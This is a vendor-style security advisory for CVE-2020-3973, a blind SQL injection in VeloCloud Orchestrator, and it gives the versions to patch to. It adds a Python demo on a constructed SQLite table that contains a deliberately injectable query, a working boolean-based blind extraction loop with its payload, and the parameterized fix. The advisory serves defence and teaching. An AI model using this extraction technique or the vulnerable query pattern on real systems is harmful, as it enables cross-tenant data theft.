The impact of this issue is high (CVSSv3 base score: 8.5). Please act accordingly to rectify the issue as stated below.
What you need to know:
VMware has released a security update to address CVE-2020-3973, a vulnerability in VeloCloud. A malicious actor with tenant access to VeloCloud Orchestrator could submit specially crafted SQL queries and obtain data to which they are not privileged.
An SQL-injection vulnerability in VeloCloud was privately reported to VMware. Patches are available to remediate this vulnerability in affected VMware-hosted VeloCloud Orchestrators.
With CVE-2020-3973, VeloCloud Orchestrator does not correctly validate input, which allows blind SQL injection: the attacker never sees query output directly but can infer data one condition at a time from the application's responses. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.5.
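The following example is added here to illustrate the vulnerability class named above; it is not VeloCloud code, and the actual injection point in Orchestrator has not been published by VMware. It uses a constructed in-memory SQLite table with assumed names (sites, tenant_id, name, api_key) and assumed sample rows. A tenant-scoped existence check interpolates user input into SQL and returns only yes/no, which is all a boolean-based blind extraction needs to read another tenant's secret; the parameterized version of the same query stops it.

```python
import sqlite3
import string

# Constructed sample data for a hypothetical multi-tenant orchestrator table.
# Schema and rows are assumptions for this example, not VeloCloud's.
SAMPLE_ROWS = [
    (1, "branch-a", "key-tenant1"),
    (2, "branch-b", "s3cr3t"),
]


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sites (tenant_id INTEGER, name TEXT, api_key TEXT)")
    db.executemany("INSERT INTO sites VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db


def site_exists_vulnerable(db, tenant_id, name):
    # Tenant filter is present, but `name` is pasted verbatim into the SQL,
    # so the caller controls the rest of the WHERE clause. The function only
    # reveals True/False, which is exactly what blind injection needs.
    sql = f"SELECT 1 FROM sites WHERE tenant_id = {int(tenant_id)} AND name = '{name}'"
    return db.execute(sql).fetchone() is not None


def site_exists_safe(db, tenant_id, name):
    # Same query with bound parameters: the driver sends `name` as data, so
    # quotes and OR clauses inside it are matched literally, never executed.
    sql = "SELECT 1 FROM sites WHERE tenant_id = ? AND name = ?"
    return db.execute(sql, (int(tenant_id), name)).fetchone() is not None


def blind_extract(oracle, victim_tenant, max_len=32):
    # Boolean-based blind extraction. Each probe closes the name literal and
    # ORs in a subquery asking "is character `pos` of the victim tenant's
    # api_key equal to `c`?". AND binds tighter than OR, so the caller's own
    # tenant filter no longer constrains the result, and the True/False
    # answer leaks one character per matching probe.
    alphabet = string.ascii_letters + string.digits + "-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in alphabet:
            payload = (
                f"x' OR (SELECT substr(api_key, {pos}, 1) FROM sites "
                f"WHERE tenant_id = {int(victim_tenant)}) = '{c}"
            )
            if oracle(payload):
                recovered += c
                break
        else:
            break  # no character matched at this position: end of secret
    return recovered


def demo():
    # Attacker authenticates as tenant 1 and targets tenant 2's api_key.
    db = build_db()
    leaked = blind_extract(lambda p: site_exists_vulnerable(db, 1, p), victim_tenant=2)
    blocked = blind_extract(lambda p: site_exists_safe(db, 1, p), victim_tenant=2)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable lookup leaked:", repr(leaked))
    print("parameterized lookup leaked:", repr(blocked))
```

The fix is the query shape, not filtering: site_exists_safe passes the attacker's whole payload as a single string value, so the same probes simply fail to match any site name and the extraction loop terminates with nothing recovered.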
Actions to be taken:
To remediate CVE-2020-3973 on VeloCloud Orchestrator 3.x, upgrade to 3.3.2 p2, or to 3.4.1 or later; alternatively, apply the vendor-supplied patch to 3.2.2, 3.3.1, 3.3.2 or 3.4.0. Contact VMware Technical Support to obtain the required patch or version. After patching, verify that the Orchestrator reports one of the fixed versions listed here.
What is the impact of not doing the actions?
A malicious actor with tenant access to VeloCloud Orchestrator could submit specially crafted SQL queries and obtain data to which they are not privileged. Since an ordinary tenant login is the only prerequisite, any tenant of an unpatched Orchestrator is a potential source of this attack.